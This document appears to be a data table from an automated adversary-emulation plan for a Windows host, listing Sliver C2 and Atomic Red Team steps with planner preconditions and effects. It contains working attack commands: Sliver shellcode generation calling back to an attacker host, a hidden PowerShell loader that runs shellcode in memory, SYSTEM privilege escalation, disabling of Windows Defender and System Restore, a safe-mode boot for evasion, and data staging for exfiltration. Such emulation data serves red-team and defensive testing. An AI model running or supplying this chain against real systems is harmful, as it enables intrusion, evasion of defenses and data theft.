- Machine ID: host11
- OS: windows
- CVE: []
| uuid | name | id | source | supported_platforms | tactics | technique | description | execution | arguments | preconditions | effects |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 2a602f8e-4d1f-49f1-b3b8-4b74f67cb63a | Build Shellcode for the Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a shellcode payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shellcode --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(shellcode_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(bin_blob_file ?file - file)', '(file_prepared_local ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| 0617285b-6005-4a73-83c5-d4dc86fcdc35 | Simulate the victim executes a shellcode payload (Windows) | ['T1059.001', 'T1620'] | Manual | ['windows'] | ['Execution', 'Defense Evasion'] | ['Command and Scripting Interpreter: PowerShell', 'Reflective Code Loading'] | None | {'executor': 'Human', 'command': '(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, open a powershell and execute these scripts)\n\n$s=[System.IO.File]::ReadAllBytes('#{SAVE_PATH}');\n$c='using System;using System.Runtime.InteropServices;public class W{[DllImport("kernel32")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);[DllImport("kernel32")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);[DllImport("kernel32")]public static extern uint WaitForSingleObject(IntPtr a,uint b);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}';Add-Type -TypeDefinition $c;$hwnd=[W]::GetConsoleWindow();if($hwnd -ne [IntPtr]::Zero){[W]::ShowWindow($hwnd,0)};\n$p=[W]::VirtualAlloc(0,$s.Length,0x3000,0x40);\n[System.Runtime.InteropServices.Marshal]::Copy($s,0,$p,$s.Length);\n$h=[W]::CreateThread(0,0,$p,0,0,0);[W]::WaitForSingleObject($h,0xFFFFFFFF)\n'} | {'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded shellcode payload file', 'type': None}} | ['(file_exists ?path - path ?file - file ?t - host)', '(bin_blob_file ?file - file)'] | ['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 2e8f1a9c-0b5e-4a7c-b6d4-9a8b2d3c5f1e | Create Directory | ['T1106'] | Sliver | ['windows', 'linux'] | ['Persistence'] | ['File System Permissions Modification'] | The mkdir command creates a new directory on the target system. |
{'executor': 'Sliver Executor', 'command': 'mkdir (#{remote_path},#{SessionID})'} | {'remote_path': {'description': 'Full path of the directory to create'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(dir_exists ?path - path ?dir - dir ?target - host)'] |
| a57fbe4b-3440-452a-88a7-943531ac872a | Zip a Folder with PowerShell for Staging in Temp | ['T1074.001'] | ART | ['windows'] | ['Collection'] | ['Data Staged: Local Data Staging'] | Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. |
{'executor': 'Powershell Executor', 'command': 'Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force\n'} | {'output_file': {'description': 'Location to save zipped file or folder', 'type': 'path', 'default': None}, 'input_file': {'description': 'Location of file or folder to zip', 'type': 'path', 'default': None}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(dir_exists ?input_file - path ?dir - dir ?target - host)'] | ['(dir_data_saved ?dir - dir ?file - file)', '(file_exists ?output_file - path ?file - file ?target - host)', '(zip_file ?file - file)'] |
| 5a1d2b9f-4e7f-8a4d-3f7a-6c2e5e9f9f7c | Privilege Escalation | ['T1134'] | Sliver | ['windows'] | ['Privilege Escalation'] | ['Access Token Manipulation'] | The get_system command attempts to gain SYSTEM-level privileges. |
{'executor': 'Sliver Executor', 'command': 'get_system (#{hosting_process},#{config},#{SessionID})'} | {'hosting_process': {'description': 'Target process ID or name for privilege escalation'}, 'config': {'description': 'Configuration options for escalation method', 'default': 'Service'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?target - host)', '(sliver_session ?executorID - executor ?target - host)'] | ['(elevated_executor ?executorID - executor)'] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 2a78362e-b79a-4482-8e24-be397bce4d85 | Safe Mode Boot | ['T1562.009'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Safe Mode Boot'] | Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot | {'executor': 'Elevated Command Prompt Executor', 'command': 'bcdedit /set safeboot network'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(endpoint_defense_disabled ?target - host)'] |
| 1c68c68d-83a4-4981-974e-8993055fa034 | Windows - Disable the SR scheduled task | ['T1490'] | ART | ['windows'] | ['Impact'] | ['Inhibit System Recovery'] | Use schtasks.exe to disable the System Restore (SR) scheduled task |
{'executor': 'Elevated Command Prompt Executor', 'command': 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(system_restore_disabled ?target - host)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 6b8df440-51ec-4d53-bf83-899591c9b5d7 | Tamper with Windows Defender ATP PowerShell | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. |
{'executor': 'Elevated Powershell Executor', 'command': 'Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n'} | None | ['(powershell ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(virus_and_threat_protection_disabled ?target - host)'] |